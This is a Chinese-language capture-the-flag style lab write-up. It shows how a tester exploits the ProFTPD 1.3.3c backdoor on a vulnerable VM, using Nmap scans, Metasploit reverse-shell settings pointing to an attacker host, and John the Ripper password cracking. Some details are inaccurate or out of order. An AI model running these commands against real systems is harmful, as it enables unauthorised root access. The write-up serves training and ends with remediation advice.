在易受攻击的Ubuntu虚拟机上进行的渗透测试演练。利用ProFTPD 1.3.3c后门(CVE-2010-4221)获取root访问权限并获取旗帜。包括Nmap枚举、Metasploit有效载荷设置以及用户哈希破解(John the Ripper)。
攻击性安全实验室
: ProFTPD 1.3.3c 后门漏洞利用(获取 root 标志)
本报告详细介绍了对一台存在漏洞的 Linux 虚拟机 (VM) 进行的渗透测试,重点关注识别一个高风险服务漏洞,该漏洞允许直接获取 root 权限。
| 详情 | 值 |
|---|---|
| 目标 IP 地址 | [ 192.168.222.130] |
| 攻击者 IP 地址 (LHOST) | [ 192.168.222.128] |
| 目标操作系统 | Ubuntu 4ubuntu2.2 (Linux 内核 3.x) |
| 目标 | 获取 Root 级别的 shell 并检索 flag 文件。 |
初始侦察包括使用 Nmap 进行服务扫描,以识别开放端口和服务版本。
命令:
sudo nmap -sS -sV 192.168.222.130
主要发现: | 端口 | 服务 | 版本 | 风险 | | :--- | :--- | :--- | :--- | 21/tcp | ftp | ProFTPD 1.3.3c | 严重(可利用的后门) | | 22/tcp | ssh | OpenSSH 7.2p2 | 低(标准服务) | | 80/tcp | http | Apache httpd 2.4.18 | 低(未发现明显 Web 漏洞) |
随后的漏洞脚本扫描确认了 FTP 服务中存在一个高度关键的后门。 Nmap 脚本输出明确显示了以 root 用户身份执行命令:
| ftp-proftpd-backdoor: | 本安装已被植入后门。 | 命令: id |_ 结果: uid=0(root) gid=0(root) groups=0(root)...
使用 Metasploit 框架来利用已确认的 ProFTPD 后门。
漏洞利用步骤: 启动 Metasploit:msfconsole
选择漏洞利用模块:use exploit/unix/ftp/proftpd_133c_backdoor
设置选项:
Bash
set RHOSTS 192.168.222.130 set PAYLOAD cmd/unix/reverse set LHOST 192.168.222.128
结果:成功建立了一个命令 shell 会话,直接授予了 root 权限(uid=0)。
使用的命令(在攻击者机器上):
Bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt 已破解的凭据:
用户: marlinspike
密码: marlinspike
由于 FTP 服务受损,该系统的安全态势极其薄弱。必须立即采取措施来保护系统:
立即修补/升级:必须立即修补或升级 ProFTPD 服务到安全版本(大于 1.3.3g),以修复已知后门及相关 CVE。
移除服务:如果系统功能不需要 FTP,则应完全移除该服务。
防火墙:实施严格的防火墙规则(iptables/ufw),阻止外部访问端口 21。
安全 Shell 配置:审查 SSH 配置,禁用 root 登录并强制使用密钥认证。 执行:exploit